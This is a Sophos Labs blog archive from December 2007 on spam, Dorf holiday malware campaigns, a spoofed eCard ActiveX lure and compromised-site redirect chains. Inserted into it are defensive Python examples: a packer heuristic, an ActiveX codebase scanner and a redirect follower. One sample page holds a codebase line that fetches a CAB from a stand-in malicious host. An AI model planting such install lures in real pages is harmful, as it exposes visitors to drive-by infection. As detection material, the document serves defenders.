Sophos

Archive for December, 2007

Chinese domains — Western porn

Over the past year SophosLabs has noticed a trend that shows no sign of stopping: certain countries’ TLDs are being abused by spammers to host content aimed at the English-speaking world.

Earlier this year we saw Belgium’s TLD (Top Level Domain), .be, being abused because you could get 10 free .be domains. Currently, the TLD of choice for spammers is either .hk or .cn (Hong Kong and China respectively).

So far the spam has mainly been porn related, though over the past week we have also seen phishing and medicine related spam.

[Image: Messages]

The content of the domains is typically quite salacious.

[Image: Content]

Fortunately, SophosLabs is blocking spam from these domains automatically. Whatever else the New Year brings, spammers will be attempting to bypass our protection to sell you porn/meds/etc, and we will update the protection to stop them.

Happy New Year from all in SophosLabs.


“If It Ain’t Broke, Don’t Fix It”

For some considerable time now there have been applications flying around the internet, popping up here and there (quite literally), which claim there are viruses or other serious issues on your computer which you simply must fix:

[Image: error.JPG]

[Image: severeerrors.JPG]

Of course, the friendly application is there to help you. You just need to register the product, paying good money, to rectify the phantom issues on your computer:

[Image: payment.JPG]

Some of the applications detect the very files they drop when installing. The plot thickens!

This intentional deception to effectively scam the public out of their hard earned cash warrants censure and makes these applications borderline malware.

So next time you see a pop-up offering to scan your computer for viruses, beware! You will most likely install undesirable software. Just close the pop-up and keep browsing, especially if you’re behind a WS1000.


Mal/Jessy-A exploiting assassination of Benazir Bhutto

While drinking my coffee this morning I was reading another blog. The story about hackers poisoning search engine results for queries about the former Prime Minister of Pakistan, Ms Benazir Bhutto, was interesting.

From my investigations it doesn’t look like the hackers were targeting Ms Bhutto but rather websites in Pakistan and India.

[Image: Search]

The script that people would download is now detected as Mal/Jessy-A. Mal/Jessy-A attempts to download Troj/Iframe-M from the same site, then Mal/WSshl-A and ultimately Mal/Basine-C.

At this time many expatriate Pakistanis or those of Pakistani origin with relatives in Pakistan will be hungry for news from the region. This malware seeding will add to their miseries. Luckily people browsing behind a WS1000 are safe.


World of Spamcraft

What with it being Christmas and all, I’ve had quite a bit of time off work to waste and decided to spend it playing with a virtual dwarf in the online World of Warcraft. After choosing your race and profession in this game and thinking up a suitably formulaic and hard-to-pronounce fantasy name like Sak’t'tk’trath or Gaeaelen, your character is thrust into a land of snowy mountain peaks, dense jungle, blasted wastelands and magical forests. The game tries its best to immerse you in a world of heroism, war and adventure, and this works right up until you hit your first large city, at which point you’re likely to encounter many other characters with random letters for names shouting about how you can buy gold from their website for real-world dollars or euros.

OH NO, MY IMMERSION

So far, the spam in World of Warcraft seems mainly to be targeted at selling things related to the game: in-game currency, services that will play your character through to the highest levels for you, and some more suspicious offerings such as programs that will, they claim, make your character immortal or able to fly. There is already plenty of malware designed to steal WoW accounts, and it’s not hard to imagine that the distribution method for these Trojans includes spamming a link to them in-game.

Some of the gold-selling websites seem to be somewhat legitimate, despite the fact that they’re breaking the usage policy of the game by advertising in it. At least one of them, though, seems a little confused about the currency used in most of Europe.

At least it’s not called the Ecu.

Players and the game’s creators, Blizzard, aren’t too happy with the effect all this spam has on the game. The easy availability of free “trial” accounts capable of walking to the busiest areas and spamming them a few minutes after being created makes it very hard for Blizzard to deal with the problem just by banning the players that spam. What they do seem to have done, though, is implement some form of spam filters. Interestingly, this filtering seems to have had the same effect on spammers in the World of Warcraft as it has on email spammers here in the real world — instead of spamming out the actual domain name of the site they want people to visit, they continually register new domain names that redirect to the eventual site that sells their product. The game even has a “Report Spam” button for players to use when they encounter spammers.

A familiar feature for email clients, but not for computer games.

With the growing popularity of World of Warcraft and online games in general, it will be interesting to see if we eventually see spam not just selling game-related products, but also flogging the usual tat — viagra, loans and questionable degree courses. I can’t wait to receive my share of that 20,000 gold that my new Orc friend stole from the Lordaeron treasury and needs to transfer to Kalimdor in a hurry, or to get my diploma in criminology from the University of Azeroth Online.


All Work And No Play Makes Dorf Spammer … Er … Irritating!

As my colleague in Australia wrote, the Dorf campaign has been relentless thus far over the festive period.

The Dorf scam has now begun to focus on a “New Year” theme, a little too early. Perhaps the Dorf spammer is still suffering from ACS.

The spammed messages encourage the user to visit the site that hosts the malware:

[Image: spamblur2.JPG]

The site itself is incredibly uninteresting in terms of content:

[Image: site2.JPG]

The link points to a file called happy-2008.exe, the newest variant of the Dorf family.

What is highly unusual is that the new sample is not packed in any way. We at SophosLabs suspect that this is a response to the fact that many anti-virus vendors, including ourselves, have very good proactive detection of suspicious runtime packers: the new campaign appears to avoid using a packer deliberately, so that packer-based proactive detection has nothing to trigger on. We have, however, updated our proactive detection of Dorf to encompass the new strain as well as Mal/Dorf-H.
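To make the evasion concrete, here is a packer heuristic of the kind the paragraph above refers to, run over PE files built in memory. This is an added example, not Sophos’s detection code; the packer section names, the 7.0 entropy threshold and the two constructed samples are illustrative assumptions, and no real Dorf bytes are involved. The point it shows is that an unpacked binary with ordinary-looking code and data sections, like the happy-2008.exe described above, passes such a heuristic untouched.

```python
# Added example (not Sophos code): a packer heuristic applied to PE files
# constructed in memory. Section names and threshold are illustrative.
import hashlib
import math
import struct

PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b".aspack", b".petite", b".MPRESS1"}
ENTROPY_THRESHOLD = 7.0  # assumption: rule-of-thumb cut-off for compressed/encrypted data


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes):
    """Yield (name, raw_bytes) for each section by walking the PE/COFF headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)   # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)      # SizeOfOptionalHeader
    first_header = coff + 20 + opt_size
    for i in range(num_sections):
        off = first_header + 40 * i
        name = pe[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def packer_indicators(pe: bytes) -> list:
    """Reasons to suspect a runtime packer; an empty list means nothing fired."""
    reasons = []
    for name, data in pe_sections(pe):
        if name in PACKER_SECTION_NAMES:
            reasons.append("section %r is a known packer name" % name)
        entropy = shannon_entropy(data)
        if entropy > ENTROPY_THRESHOLD:
            reasons.append("section %r entropy %.2f exceeds %.1f" % (name, entropy, ENTROPY_THRESHOLD))
    return reasons


def is_probably_packed(pe: bytes) -> bool:
    return bool(packer_indicators(pe))


def build_pe(sections) -> bytes:
    """Constructed test input: a minimal PE32 with the given [(name, data)] sections."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional_header = b"\0" * 0xE0  # PE32 optional header size; contents irrelevant here
    coff_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                              len(optional_header), 0x0102)
    headers_end = e_lfanew + 4 + len(coff_header) + len(optional_header) + 40 * len(sections)
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF  # 512-byte file alignment
    section_headers, body = b"", b""
    for name, data in sections:
        section_headers += struct.pack("<8sIIIIIIHHI", name, len(data), raw_ptr,
                                       len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    image = dos_header + b"PE\0\0" + coff_header + optional_header + section_headers
    return image.ljust(raw_ptr - len(body), b"\0") + body


def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for a compressed or encrypted section body."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed samples (no real malware bytes): a packed-looking binary, an
# entropy-only case, and a plain one resembling an unpacked executable.
PLAIN_CODE = b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x7d\x08\x33\xc0\x5f\x5e\x5b\xc9\xc3" * 200
PACKED_SAMPLE = build_pe([(b"UPX0", b""), (b"UPX1", pseudo_random_bytes(4096))])
HIGH_ENTROPY_SAMPLE = build_pe([(b".text", pseudo_random_bytes(4096))])
PLAIN_SAMPLE = build_pe([(b".text", PLAIN_CODE), (b".data", b"Happy New Year 2008!\0" * 100)])

if __name__ == "__main__":
    for label, sample in (("packed", PACKED_SAMPLE), ("high-entropy", HIGH_ENTROPY_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, packer_indicators(sample) or "no packer indicators")
```

The plain sample produces no indicators at all, which is exactly the gap the unpacked Dorf variant exploits; a heuristic like this has to be backed by detection of the actual payload, which is what the updated Dorf identities provide.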

By the by, while we are on the subject of proactive detection, last week my colleague in the UK mentioned the superfluous Pushdo campaign, which tends to manifest itself exclusively on Wednesdays. We did not see the Pushdo campaign today (Boxing Day), but we did see it yesterday, Christmas Day itself. Needless to say, we still detect the associated malware sample as Troj/Pushdo-Gen. The Pushdo author might as well have enjoyed his Christmas pudding rather than attempt to inflict misery on the public in a most uncharitable fashion.


Santa Has Brought In His Little Dorfs

The Dorf spam campaign shows no signs of abating during the festive season.

This morning, SophosLabs analysts continue to battle against the little Dorfs (excuse the bad pun). The latest incarnations being spammed around the world are being detected as W32/Dorf-AK.

Malware authors have shown that the festive season is the perfect time to release new malware. They hope to capitalise on the fact that, presumably, everyone is too busy with Christmas shopping, partying and having a good time to notice, or to bother updating their antivirus signatures. This inaction is particularly dangerous for end users, because malware authors sometimes specifically target public holidays when the user’s guard is down.

This has all been seen before. In 2004, for example, the W32/Zafi-D worm targeted the Christmas season precisely in order to spread itself, and a year after its release W32/Zafi-D was still heading the malware list, topping Sophos’s Top 10 Malware List for 2005.

The presence of W32/Dorf-AK has shown that in the area of security, malware never takes a holiday. And for the infected user, this certainly brings no Christmas joy.


The Christmas menu

This year’s Christmas menu had it all: an assortment of ‘enlargement’ medications, copious amounts of supposedly free goodies (just take a survey or three and wait … an infinity), some very generous (and pre-approved) credit allowances, various phish, the odd Trojan, and I got it all without having to ask!

The only problem was this year’s menu was the same as last year’s. In fact, it was the same as yesterday’s, last week’s, last month’s and so on apart from maybe a little Christmas theme.

Those seeking to make a malware nuisance or money from the usual spam and scams do not take time out during any festive period around the world. So, we do not either.

To all those currently eating Christmas lunch at their desk, have a merry day!


Return Of The Dorfs: A Christmas Special

Today spamtraps monitored by SophosLabs received samples of a malware campaign spammed out using the combination of the holiday season and the promise of a “Personal Holiday Strip Show” in an attempt to infect computers. The format of the messages was very similar to previous malware campaigns we have detected over the past 8-10 months:

Many varying subject lines, generic enough to entice recipients to view the message.

[Image: StripShow Subject Lines]

The message body contained thousands of variations, with a greeting and single paragraph, all attempting to direct the user to the same specific website.

[Image: Xmas-stripshow-Sample1]

[Image: Xmas-stripshow-Sample2]

The website itself contained images of scantily clad women under the title “Mrs. Claus Gone Wild”. The images and the “Download for free now!” button both linked to an executable detected as W32/Dorf-AE.

[Image: Xmas-stripshow-website]

This is just yet another example of malware writers and spammers exploiting current world news or holidays in an attempt to grow their botnets.


Spoofed eCard site infecting victims with Cimuz

Or perhaps the more festive title “Jingle All the Way ( …to a Cimuz infection)” ?

Overnight SophosLabs identified a malicious eCard spam campaign that was spoofing the legitimate AmericanGreetings.com service. The spam messages used in the campaign enticed recipients into clicking on the embedded link to view their card.

[eCard spam]

Anyone who clicked on the link would not see their eCard, but instead a message informing them that an additional ActiveX control is required to view it.

[Spoofed eCard site]

Within the source of this page is the culprit: a malicious embedded object pointing to an installation package hosted on the malicious domain.

[Source for malicious object]

If the ActiveX control installation is authorised, the CAB package is retrieved and the file update.exe is extracted and executed (detection added as Troj/Cimuz-CS). This file proceeds to infect the victim with Cimuz:

  • flashupdate.exe is written to the temporary folder and executed
  • an attempt is made to connect to remote servers and download additional files
  • at the time of writing, one of these files was available, and contained an additional URL to download from

Thankfully, the flashupdate.exe file is proactively detected as Mal/Cimuz-D:

[Cimuz-D proactive detection]

The Cimuz family of Trojans is no stranger to this blog [1,2,3], but in recent months it has been pretty quiet. Clearly the group behind this latest attack are in need of a little financial top-up over the Christmas period. Don’t help them: follow the usual rules, especially over Christmas and New Year, when social engineering tricks may work that little bit too easily.
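The “additional ActiveX control” lure works because an `<object>` element with a `codebase` attribute makes Internet Explorer offer to download and install whatever package that URL points to. Here is one way to pull such objects out of a page’s source and decide whether the package comes from the vendor that really owns the control. This is an added example, not Sophos code; the page HTML is constructed to mirror the spoofed eCard page described above, the ecard-spoof.example host and CAB path are hypothetical, and the allowlist mapping a CLSID to its vendor’s download host is an illustrative assumption (the only entry is the well-known Flash Player CLSID and its macromedia download host).

```python
# Added example (not Sophos code): scan a page for <object> elements that
# would make IE offer to download and install a control. Sample HTML and the
# ecard-spoof.example host are constructed, not the real spoofed site.
from html.parser import HTMLParser
from urllib.parse import urlparse

# CLSID -> host the vendor really serves that control's CAB from.
# Assumption: illustrative allowlist; Flash's CLSID and host are the well-known ones.
VENDOR_CODEBASE_HOSTS = {
    "D27CDB6E-AE6D-11CF-96B8-444553540000": "download.macromedia.com",  # Shockwave Flash
}


class ObjectScanner(HTMLParser):
    """Collect every <object> with its classid, codebase and <param> children."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object":
            self._current = {"classid": a.get("classid"), "codebase": a.get("codebase"), "params": {}}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][(a.get("name") or "").lower()] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def normalise_clsid(classid):
    """'clsid:{d27cdb6e-...}' -> 'D27CDB6E-...'; None if the attribute is absent."""
    if not classid:
        return None
    return classid.split(":", 1)[-1].strip("{}").upper()


def install_prompts(html):
    """One finding per <object> whose codebase would trigger a package download."""
    scanner = ObjectScanner()
    scanner.feed(html)
    findings = []
    for obj in scanner.objects:
        codebase = obj["codebase"]
        if not codebase:
            continue  # bare CLSID: uses an already-installed control, nothing is fetched
        url = codebase.split("#", 1)[0]  # drop the "#version=a,b,c,d" suffix
        host = (urlparse(url).hostname or "").lower()
        clsid = normalise_clsid(obj["classid"])
        expected = VENDOR_CODEBASE_HOSTS.get(clsid)
        if expected is None:
            verdict = "unknown-control-install"   # nobody vouches for this CLSID
        elif host != expected:
            verdict = "spoofed-vendor-control"    # known CLSID, package from elsewhere
        else:
            verdict = "vendor-codebase"
        findings.append({"clsid": clsid, "codebase": url, "host": host,
                         "is_cab": url.lower().endswith(".cab"), "verdict": verdict})
    return findings


# Constructed page source modelled on the "additional ActiveX control is
# required" lure; the second object shows the genuine vendor codebase for contrast.
SPOOFED_ECARD_PAGE = """
<html><body>
<p>An additional ActiveX control is required to view your card.</p>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        codebase="http://ecard-spoof.example/ax/update.cab#version=9,0,0,0"
        width="1" height="1">
  <param name="movie" value="card.swf">
</object>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
</object>
</body></html>
"""

if __name__ == "__main__":
    for finding in install_prompts(SPOOFED_ECARD_PAGE):
        print(finding["verdict"], finding["codebase"])
```

The check deliberately keys on the CLSID rather than on the file name: the spoofed page reuses a genuine control’s CLSID so that the install prompt looks like a routine Flash update, and only the mismatch between that CLSID and the host serving the CAB gives it away.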


The 2007 cash cow - compromised web sites

By now, most users are broadly familiar with the concept of compromised machines: machines that have been pwned and are under some form of remote command. The familiarity even extends to appreciating some of the uses to which compromised machines can be put. Perhaps the publicity that families such as Dorf (aka Storm) have generated helps people to understand the dangers of having a machine compromised.

I am in no way convinced the same is true for people’s understanding of compromised web sites. Despite significant press attention throughout 2007, and numerous articles and technical papers published by security vendors, I am still left with the feeling that site owners, administrators and developers do not truly grasp the consequences of a compromised web server.

Where sites used to be compromised to display the hacker’s tag, they are now compromised in a more sinister, functional way. The use of compromised sites by hackers has grown apace over the past 12-18 months. Most of the sites involved are compromised to link to other remote servers. This creates a ‘malware delivery mechanism’, in some cases a cascade involving many sites. Of course, the victim is unaware of this: when they browse the compromised page the chain of requests to other malicious content happens silently and in the blink of an eye (something commonly referred to as a drive-by download).

The use of compromised sites extends beyond malware, however. It is important to remember that once compromised, the site can be used to host whatever content the hacker wants. The situation is highly dynamic as well: by directing compromised sites to other sites they own, hackers are able to control the flow of web traffic to a final destination of their choice.

To help illustrate these points, I thought I would give a couple of examples I have seen this week.

Firstly, a phishing attack. We frequently see phishing attacks where the phish site (a spoofed version of the targeted institution’s site) is hosted on a compromised site. Earlier today, amongst the phishing attacks we identified, I noticed two (targeting the National Bank of Kuwait and the Abbey National).

[Abbey phish]

The second example highlights the multiple uses a compromised site is often put to. A couple of days ago, we identified a routine meds campaign where the spam message contained a link to a page on various sites.

[Meds campaign spam]

The page in question simply redirected to another site displaying the usual shop window for little blue pills and the like. However, closer inspection of the sites used in the spam messages showed that many of them were compromised sites: the spam message simply pointed to a redirect page that had been uploaded there. Several of these compromised sites were not new to SophosLabs; we had seen them being used in various other web attacks. One such attack is illustrated in the flowchart below. The green arrows coming in from the top represent the links from these compromised sites.

[Image: comp2.png]

The web page highlighted in yellow in this diagram is one under the hackers’ direct control, enabling them to direct the flow of traffic. Such control is of value: other hackers may pay money for the traffic to be directed towards their attacks, in order to infect victims with their malware.
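The flowchart above is, in the end, a set of redirect chains that converge on one page the attackers control. The following code walks such chains the way a browser would (HTTP 3xx Location headers, meta refresh tags and simple JavaScript location assignments) and then reports which host the chains from several entry points all pass through, which is how the yellow hub in the diagram is found. This is an added example, not Sophos code or tooling; the “web” it walks is an in-memory map of constructed .example hosts standing in for the compromised sites, the hub and the meds shop in the post, so nothing is fetched from the internet.

```python
# Added example (not Sophos code): follow redirect chains and find the hub
# that several compromised entry pages feed. The WEB map below is constructed;
# the .example hosts are reserved names, not real sites.
import re
from collections import defaultdict
from urllib.parse import urljoin, urlparse

META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
REFRESH_URL = re.compile(r"content\s*=\s*[\"']?\s*\d+\s*;\s*url\s*=\s*([^\"'>\s]+)", re.I)
JS_LOCATION = re.compile(r"(?:window|document|top|self)?\.?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.I)


def next_hop(url, status, headers, body):
    """Where the browser would go next, or None if this page ends the chain."""
    if 300 <= status < 400 and "location" in headers:
        return urljoin(url, headers["location"])
    for tag in META_TAG.findall(body):
        if re.search(r"http-equiv\s*=\s*[\"']?refresh", tag, re.I):
            m = REFRESH_URL.search(tag)
            if m:
                return urljoin(url, m.group(1))
    m = JS_LOCATION.search(body)
    return urljoin(url, m.group(1)) if m else None


def follow(url, fetch, max_hops=10):
    """Return (chain, outcome). fetch(url) -> (status, headers, body); header names lower-cased."""
    chain, seen = [url], {url}
    while len(chain) <= max_hops:
        status, headers, body = fetch(chain[-1])
        nxt = next_hop(chain[-1], status, headers, body)
        if nxt is None:
            return chain, "final"
        if nxt in seen:
            return chain + [nxt], "loop"   # redirect loop: stop rather than spin
        chain.append(nxt)
        seen.add(nxt)
    return chain, "too-many-hops"


def hubs(entry_urls, fetch):
    """Map each intermediate host to the set of entry hosts whose chains pass through it."""
    through = defaultdict(set)
    for entry in entry_urls:
        chain, _ = follow(entry, fetch)
        for hop in chain[1:-1]:  # exclude the entry page and the final destination
            through[urlparse(hop).hostname].add(urlparse(entry).hostname)
    return dict(through)


# Constructed web: two compromised sites carrying an uploaded redirect page,
# one attacker-controlled hub, one final shop. Stand-ins for the flowchart.
WEB = {
    "http://compromised-a.example/images/x.html": (200, {}, '<html><head><meta http-equiv="refresh" '
        'content="0; url=http://hub.example/go.php?id=17"></head></html>'),
    "http://compromised-b.example/blog/wp-content/r.php": (200, {},
        '<script>window.location.href="http://hub.example/go.php?id=22";</script>'),
    "http://hub.example/go.php?id=17": (302, {"location": "http://meds-shop.example/"}, ""),
    "http://hub.example/go.php?id=22": (302, {"location": "http://meds-shop.example/"}, ""),
    "http://meds-shop.example/": (200, {}, "<html>little blue pills</html>"),
}
ENTRY_URLS = ["http://compromised-a.example/images/x.html",
              "http://compromised-b.example/blog/wp-content/r.php"]


def fetch(url):
    """Offline stand-in for an HTTP client; unknown URLs look like a 404."""
    return WEB.get(url, (404, {}, ""))


if __name__ == "__main__":
    for entry in ENTRY_URLS:
        chain, outcome = follow(entry, fetch)
        print(outcome, " -> ".join(chain))
    print("hubs:", hubs(ENTRY_URLS, fetch))
```

Because the hub answers with a 302 it can be re-pointed at any moment, so a block list built from final destinations lags behind; the host that every chain passes through is the more durable indicator, and blocking it cuts off all the compromised entry points at once.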

In short, compromised web sites provide a mechanism for hackers to direct a huge amount of traffic into ‘paths’ or ‘flows’ of their choice. They also provide a convenient repository for storing malicious or illegal content. We have seen a sharp growth in malicious web activity in 2007. The relatively ‘soft’ nature of the target (poorly secured sites, servers, vulnerable applications etc) makes it very enticing for the bad guys. Let’s hope that 2008 will be the year in which the many facets of web security are taken more seriously.